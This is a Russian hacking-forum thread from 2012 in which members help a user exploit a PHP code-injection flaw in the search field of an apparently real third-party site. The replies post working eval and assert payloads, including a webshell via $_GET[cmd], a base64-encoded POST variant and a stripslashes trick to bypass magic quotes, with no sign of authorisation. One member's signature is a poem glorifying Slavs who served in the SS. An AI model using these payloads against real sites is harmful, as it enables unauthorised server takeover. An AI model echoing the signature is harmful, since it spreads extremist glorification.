HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.09.2012, 15:26
Avtoritet
Участник форума
Регистрация: 29.09.2010
Сообщений: 174
Провел на форуме:
39202

Репутация: -5
По умолчанию

На сайте найдена уязвимость в строке поиска забиваешь {${phpinfo()}} и получаешь всю раскладочку по нему. когда вбиваешь ковычку он её меняет на \ и удаляет всё что после. а каждую \ умножает на 2. как обойти логику?
 
Ответить с цитированием

  #2  
Старый 26.09.2012, 15:45
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Avtoritet  
На сайте найдена уязвимость в строке поиска забиваешь {${phpinfo()}} и получаешь всю раскладочку по нему. когда вбиваешь ковычку он её меняет на \ и удаляет всё что после. а каждую \ умножает на 2. как обойти логику?
Можно попробовать:

Код:
{${assert($_GET[12])}}
Если _ тоже фильтруется, можно использовать PHP-функции для работы с массивами, наподобие end, restet, prev и использовать их по отношению к $GLOBALS или использовать функции(При фильтровании$), значение которых можно устанавливать самим, в названии которой не содержится фильтруемых символов, однако в зависимости от сборки таких может не быть.

UDP:

Для каждого отдельного случая нужно самостоятельно подбирать вариации кода.
 
Ответить с цитированием

  #3  
Старый 26.09.2012, 15:53
Avtoritet
Участник форума
Регистрация: 29.09.2010
Сообщений: 174
Провел на форуме:
39202

Репутация: -5
По умолчанию

Цитата:
Сообщение от XAMEHA  
Можно попробовать:
Код:
{${assert($_GET[12])}}
Если
_
тоже фильтруется, можно использовать PHP-функции для работы с массивами, наподобие end, restet, prev и использовать их по отношению к
$GLOBALS
или использовать функции(При фильтровании
$
), значение которых можно устанавливать самим, в названии которой не содержится фильтруемых символов, однако в зависимости от сборки таких может нет быть.
Warning: assert() [function.assert]: Assertion failed in /var/www/...../www/netcat/require/s_list.inc.php(292) : eval()'d code on line 1

вот что выпало
 
Ответить с цитированием

  #4  
Старый 26.09.2012, 16:05
C.php
Новичок
Регистрация: 18.06.2012
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Что мешает написать прямо так {${eval($_GET[cmd])}} .

Готовый шелл прямо
 
Ответить с цитированием

  #5  
Старый 26.09.2012, 16:44
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Можно еще загонять в base64, с его помощью можно передавать большие запросы не боясь фильтра кавычек!

Цитата:
Сообщение от None  
{${eval(base64_decode($_POST[e]))}}
 
Ответить с цитированием

  #6  
Старый 26.09.2012, 16:45
Avtoritet
Участник форума
Регистрация: 29.09.2010
Сообщений: 174
Провел на форуме:
39202

Репутация: -5
По умолчанию

Цитата:
Сообщение от C.php  
Что мешает написать прямо так {${eval($_GET[cmd])}} .
Готовый шелл прямо
как не странно, такой обрабатывает корректно. и пишет по вашему запросу ничего не найдено.
 
Ответить с цитированием

  #7  
Старый 26.09.2012, 16:52
Avtoritet
Участник форума
Регистрация: 29.09.2010
Сообщений: 174
Провел на форуме:
39202

Репутация: -5
По умолчанию

Цитата:
Сообщение от cat1vo  
Можно еще загонять в base64, с его помощью можно передавать большие запросы не боясь фильтра кавычек!
амперсанта фильтруется тоже.
 
Ответить с цитированием

  #8  
Старый 26.09.2012, 16:55
Avtoritet
Участник форума
Регистрация: 29.09.2010
Сообщений: 174
Провел на форуме:
39202

Репутация: -5
По умолчанию

когда вбиваешь {${print(2)}} он выводит 22
 
Ответить с цитированием

  #9  
Старый 27.09.2012, 00:03
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Avtoritet  
как не странно, такой обрабатывает корректно. и пишет по вашему запросу ничего не найдено.
?action=index&text={${eval($_GET[cmd])}}&cmd=phpinfo();

как я понял у тебя MQ= on и ты сразу не можешь вставить код с кавычкой :

?action=index&text={${eval(stripslashes($_GET[cmd]))}}&cmd=echo 'fff';
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #10  
Старый 27.09.2012, 10:38
Avtoritet
Участник форума
Регистрация: 29.09.2010
Сообщений: 174
Провел на форуме:
39202

Репутация: -5
По умолчанию

Цитата:
Сообщение от HAXTA4OK  
?action=index&text={${eval($_GET[cmd])}}&cmd=phpinfo();
как я понял у тебя MQ= on и ты сразу не можешь вставить код с кавычкой :
?action=index&text={${eval(stripslashes($_GET[cmd]))}}&cmd=echo 'fff';
Долго думает потом опера выдаёт следующее:

Could not locate remote server

Check that the address is spelled correctly, or try searching for the site.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.